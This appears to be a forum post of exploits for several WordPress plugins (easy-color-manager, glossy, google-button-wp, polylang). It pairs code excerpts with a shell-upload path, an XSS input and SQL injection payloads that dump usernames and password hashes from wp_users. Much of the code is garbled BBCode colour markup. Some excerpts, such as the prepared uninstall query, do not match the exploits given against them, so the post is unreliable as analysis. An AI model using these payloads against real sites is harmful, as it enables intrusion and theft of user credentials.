easy-color-manager #plugin# shell upload
easy-color-manager.php
PHP код:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"]) as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]){
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]] ===[/COLOR][COLOR="#DD0000"]'navigation-02'[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' 背景'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' パネル'[/COLOR][COLOR="#007700"];
} else {
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] ;
}
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[COLOR="#0000BB"]
[/COLOR][/COLOR]" />
表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。
...[/COLOR]
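shell (the upload handler itself is not part of the excerpt above, which only echoes background part names):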
Код:
http://wp/wp-content/plugins/easycolmanager/uploads/shell.php
glossy #plugin# sql-inj
glossy.admin.addEntry.php
PHP код:
// ... (earlier part of glossy.admin.addEntry.php omitted by the poster)

// Copy the submitted form fields straight out of $_POST. No validation,
// unslashing or sanitising happens in the lines shown here.
// NOTE(review): no nonce or capability check is visible in this excerpt;
// confirm whether one runs before this point.
$entryName = $_POST['gs_entry_name'];
$entryTitle = $_POST['gs_entry_title'];
$entryLink = $_POST['gs_entry_link'];
$entryDimensions = $_POST['gs_entry_dimensions'];
$entryContents = $_POST['gs_entry_contents'];

// Hand everything to gs_save_entry(). $pageAction and $entryOriginalName are
// set outside this excerpt.
$saveEntry = gs_save_entry($entryName, $entryTitle, $entryLink, $entryDimensions, $entryContents, $pageAction, $entryOriginalName);

// If $saveEntry is empty (no errors) and we've been adding, switch to editing mode
if (empty($saveEntry))
{
    $completedAction = $pageAction;
    $pageAction = "Edit";
    $entryOriginalName = $entryName;
}
// ... (rest of the file omitted by the poster)
glossy.admin.addEntry.php
PHP код:
// ... (start of the if/else chain omitted by the poster)
} else if ($entryAction == "Add" || $entryName != $entryOriginalName) {
    // Look for an existing entry with the same name. $entryName is handed to
    // $wpdb->prepare() as a placeholder argument rather than being concatenated
    // into the SQL text; only $gs_tableName is concatenated.
    // NOTE(review): where $gs_tableName comes from is not shown; confirm it
    // is not request-controlled.
    $query = $wpdb->prepare("SELECT gs_name FROM ".$gs_tableName." WHERE gs_name = '%s';", $entryName);
    $existingName = $wpdb->get_var($query);
    if ($existingName)
    {
        // A row with this name came back: clear $saveData and record 'taken'
        // for the entryName field.
        $saveData = false;
        $errorFields['entryName'] = 'taken';
    }
}
// ... (rest of the function omitted by the poster)
exploit:
Код:
POST: wp-content/plugins/glossy/glossy.admin.addEntry.php
data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+
google-button-wp #plugin# passive XSS
google.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#DD0000"]'.__("General options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Active share buttons", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($active_buttons as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]active_buttons[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show buttons in these pages", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($show_in as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]show_in[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Position", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Google +1 options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Button width", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]px[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("default: 90", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show counter", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
...[/COLOR][/COLOR]
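Vulnerable input: name "px", ex: alert(). The excerpt has lost the input markup, so the unescaped output is not visible here; the usual fix is esc_attr() on the value when the form is rendered.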
polylang #plugin# double sql-inj
languages-form.php
PHP код:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" />[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]description[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" />
[COLOR="#0000BB"][/COLOR]
...[/COLOR]
admin.php
PHP код:
// ... (earlier part of admin.php omitted by the poster)
if (isset($_POST['lang'])) {
    // Update links to this language in posts and terms in case the slug has been modified
    // Only 'lang' and 'slug' are read from $_POST in the lines shown.
    // NOTE(review): $lang is dereferenced without checking what get_language()
    // returned; confirm it cannot be null/false here. No nonce or capability
    // check is visible in this excerpt either.
    $lang = $this->get_language($_POST['lang']);
    $old_slug = $lang->slug;
    if ($old_slug != $_POST['slug']) {
        // update the language slug in posts meta
        // ... (rest of the branch omitted by the poster)
exploit #1:
Код:
POST: wp-contents/plugins/polylang/admin.php
data: lang=albanskiy&slug=newnew&set=1+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+&time=now
uninstall.php
PHP код:
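// ... (earlier part of uninstall.php omitted by the poster)
// NOTE(review): a WP_UNINSTALL_PLUGIN guard, if there is one, would sit in the
// omitted part above; confirm the file cannot be requested directly.

// Walk every registered language and remove what refers to it.
$languages = get_terms('language', array('hide_empty' => false));
foreach ($languages as $lang) {
    // delete references to this language in all posts
    $args = array('numberposts' => -1, 'post_type' => 'any', 'post_status' => 'any');
    $posts = get_posts($args);
    foreach ($posts as $post) {
        delete_post_meta($post->ID, '_lang-'.$lang->slug);
    }
    // delete references to this language in categories & post tags
    $terms = get_terms(array('category', 'post_tag'), 'get=all');
    foreach ($terms as $term) {
        delete_metadata('term', $term->term_id, '_language');
        delete_metadata('term', $term->term_id, '_lang-'.$lang->slug);
    }
    // finally delete the language itself
    wp_delete_term($lang->term_id, 'language');
}

// delete the termmeta table only if it is empty as other plugins may use it
$table = $wpdb->termmeta;
// The id arrives in the query string, so it is forced to a non-negative integer
// and bound through prepare() instead of being interpolated into the SQL text.
// (As posted, "...$_GET['id']" with a quoted key inside a double-quoted string
// does not parse in PHP.)
// NOTE(review): the WHERE clause does not match the "only if it is empty"
// comment above; confirm the intended condition.
$poly_id = isset($_GET['id']) ? absint($_GET['id']) : 0;
$count = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $table WHERE poly_id = %d", $poly_id));
if (!$count) {
    $wpdb->query("DROP TABLE $table;");
    unset($wpdb->termmeta);
}
// ... (rest of the file omitted by the poster)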
exploit #2:
Код:
http://wp/wp-contents/plugins/polylang/uninstall.php?id=-666666666+union+select+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+from+wp_users+--